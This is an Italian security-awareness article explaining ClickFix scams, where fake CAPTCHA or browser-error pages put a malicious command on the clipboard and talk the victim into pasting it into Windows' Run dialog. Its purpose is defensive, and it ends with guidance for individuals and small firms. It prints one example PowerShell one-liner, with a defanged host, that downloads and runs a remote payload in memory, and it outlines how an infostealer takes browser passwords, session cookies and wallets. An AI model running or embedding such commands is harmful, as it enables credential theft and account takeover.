ClickFix: la truffa del "incolla questo per risolvere" che ti installa un malware

L'hai quasi sicuramente già vista. Una pagina che dice "verifica di essere umano", oppure "il tuo browser ha riscontrato un errore, segui questi passaggi per risolvere". Le istruzioni sembrano innocue: premi Win+R, incolla, premi Invio. Una procedura come tante. Si chiama ClickFix, e in questo momento è una delle tecniche di attacco più diffuse al mondo. Il suo genio - e il motivo per cui è così pericolosa - è che non sfrutta una vulnerabilità del tuo computer. Sfrutta te.

Come funziona la catena

Lo scenario è quasi sempre lo stesso. Arrivi su una pagina - un finto CAPTCHA, un finto errore di Chrome, un finto documento "da sbloccare" - che ti dà istruzioni passo-passo da seguire per continuare. Mentre le leggi, un pezzo di JavaScript nella pagina ha già copiato di nascosto un comando nella tua clipboard. Tu apri la finestra Esegui di Windows con Win+R, incolli con Ctrl+V - e lì finisce il comando dell'attaccante, non quello che pensi - e premi Invio. Quel comando, di solito un mshta o un powershell offuscato, scarica ed esegue un malware. Non hai aperto un allegato, non hai cliccato un link sospetto. Hai semplicemente seguito una procedura.

Cosa fa davvero quel comando

Vale la pena aprirlo, perché ogni pezzo ha uno scopo preciso. Quello che ti viene incollato, in forma semplificata, assomiglia a questo:

powershell -W Hidden -nop -ep bypass -c "IEX(IWR -useb hxxps://cdn-verify[.]top/x)"

Tradotto pezzo per pezzo:

• powershell - l'interprete di script di Windows. È già installato ovunque ed è firmato Microsoft: per il sistema è un programma fidato, non un virus.
• -W Hidden - avvia la finestra nascosta. Non vedi niente aprirsi: nessun lampo, nessuna console.
• -nop - salta il profilo di PowerShell, per partire più veloce e senza configurazioni di mezzo.
• -ep bypass - ignora la policy che in teoria dovrebbe bloccare l'esecuzione di script non fidati.
• IWR (Invoke-WebRequest) - scarica un file da un indirizzo web: qui, il vero malware.
• IEX (Invoke-Expression) - esegue il testo appena scaricato come codice, direttamente in memoria, senza mai salvarlo su disco.

Quell'ultimo punto è il cuore di tutto: l'attacco è fileless. Non viene scritto nessun file sull'hard disk, quindi l'antivirus tradizionale - che lavora scansionando i file - non ha nulla da scansionare. Il malware vive nella RAM, eseguito da un processo Windows legittimo che la vittima ha lanciato di persona.

Passo per passo, dietro le quinte

Ecco cosa succede davvero dal click all'esfiltrazione, anche se sullo schermo non vedi quasi nulla:

1. Dirottamento della clipboard. Nel momento in cui clicchi "Verify" o "Fix", un JavaScript nella pagina copia di nascosto il comando nella tua clipboard. Quello che incollerai non è ciò che pensi: è già il comando dell'attaccante.
2. Esecuzione. Win+R apre la finestra Esegui, incolli, premi Invio. Windows lancia PowerShell con quei parametri. Per un EDR sembra "PowerShell che parte" - un evento normalissimo - non un malware.
3. Download in memoria. IWR contatta il server dell'attaccante e scarica il payload vero - lo stealer - direttamente nella RAM.
4. Esecuzione fileless. IEX lo esegue al volo. Nessun file su disco, niente da far scattare all'antivirus classico.
5. Raccolta. Lo stealer apre i database del browser (le password salvate in Login Data, i cookie in Cookies: sono file SQLite), li decifra usando le API DPAPI di Windows - che girano con i tuoi stessi permessi - e raccoglie anche wallet di criptovalute, token e file interessanti.
6. Esfiltrazione. Impacchetta tutto e lo invia al server di comando e controllo (C2) via HTTPS, mimetizzato nel normale traffico web cifrato.
7. Sparizione. Molti stealer sono "smash and grab": rubano e se ne vanno in pochi minuti, senza installare niente di permanente, così l'analisi forense trova pochissime tracce.

Perché funziona

Due motivi, uno psicologico e uno tecnico. Quello psicologico è che sfrutta la routine del "segui i passaggi per risolvere il problema" - la stessa identica cosa che fai dieci volte al giorno quando l'IT ti dice come sistemare qualcosa. Il cervello non alza la guardia, perché è una procedura familiare, non un allegato sospetto. Quello tecnico è ancora più insidioso: la tecnica aggira gran parte delle difese proprio perché sei tu a lanciare il comando. Non c'è una vulnerabilità da sfruttare, non c'è un file malevolo che un antivirus possa intercettare prima dell'apertura. L'esecuzione parte da un'azione legittima dell'utente su uno strumento legittimo di Windows. È un attacco economico, che scala all'infinito - basta una pagina web - e che funziona.

Cosa ti installa davvero

Quasi sempre, un infostealer. Ruba le password salvate nel browser, i wallet di criptovalute, e - la parte che la maggior parte delle persone sottovaluta - i cookie di sessione. Ed è qui che casca il "tanto io ho l'autenticazione a due fattori". Un cookie di sessione rubato significa che l'attaccante è già dentro i tuoi account: è loggato come te, senza bisogno della tua password, e bypassando completamente l'MFA, perché la tua sessione era già stata autenticata. L'MFA protegge il momento del login, non una sessione già attiva che ti viene rubata da sotto il naso.

Perché sta esplodendo

ClickFix non è nata ieri: la tecnica è stata documentata dai ricercatori di Proofpoint nel 2024 - che le hanno dato il nome - ed è esplosa nel corso del 2025. Per dare la misura, secondo i dati pubblicati da Microsoft solo nella prima metà del 2025 gli attacchi di questo tipo sono cresciuti di oltre il 500%, arrivando a guidare quasi la metà delle intrusioni che l'azienda traccia. Nel mio lavoro tra simulazione di phishing e threat intelligence vedo queste campagne da entrambi i lati, e la traiettoria è chiara. ClickFix è diventato uno dei vettori di accesso iniziale più usati perché mette d'accordo tutto ciò che un attaccante vuole: costa pochissimo (è una pagina), non richiede lo sviluppo di un exploit, scavalca i filtri delle email perché spesso la vittima ci arriva da una pubblicità malevola o da un sito compromesso e non da un allegato, e sfrutta l'unica superficie d'attacco che non riceve mai una patch - le persone. Finché convincere un essere umano resterà più facile che bucare un sistema aggiornato, tecniche come questa domineranno.

Come riconoscerla

C'è una sola regola, e ti basta: nessun sito legittimo ti chiederà mai di aprire la finestra Esegui (Win+R), un terminale o PowerShell e incollarci dentro qualcosa. Un CAPTCHA vero non ha bisogno delle tue scorciatoie da tastiera. Un errore vero del browser non si risolve copiando comandi. Se una pagina - per quanto convincente, per quanto urgente - ti dice "premi questi tasti e incolla", quella è la fine della conversazione: chiudi e vai via. Non è una procedura, è un attacco che ti chiede di eseguirlo tu.

Come difendersi, lato azienda

Per una PMI la difesa ha due gambe. La prima è umana: le persone vanno esposte a questo schema specifico prima che lo incontrino dal vivo, idealmente con simulazioni che includono il pattern ClickFix, non con una slide generica sul phishing. Una persona che ha già visto la trappola in un test la riconosce nel mondo reale. La seconda è tecnica: regole di riduzione della superficie d'attacco che impediscono a mshta e agli interpreti di script di partire da contesti anomali, application control, un EDR che ragiona sul comportamento e non solo sulle firme, e restrizioni su chi può davvero lanciare PowerShell su una macchina aziendale. Le due gambe servono entrambe: i controlli tecnici prendono ciò che l'attenzione umana lascia passare, e viceversa.

La lezione

L'exploit più affidabile del 2026 non è uno zero-day pagato a peso d'oro: è un'istruzione convincente data alla persona giusta nel momento giusto. E la difesa, contro questa classe di attacchi, non è mai solo tecnologia. È insegnare alle persone l'unica regola che le mette al riparo da metà delle minacce moderne: non incollare mai un comando che ti ha dato qualcun altro.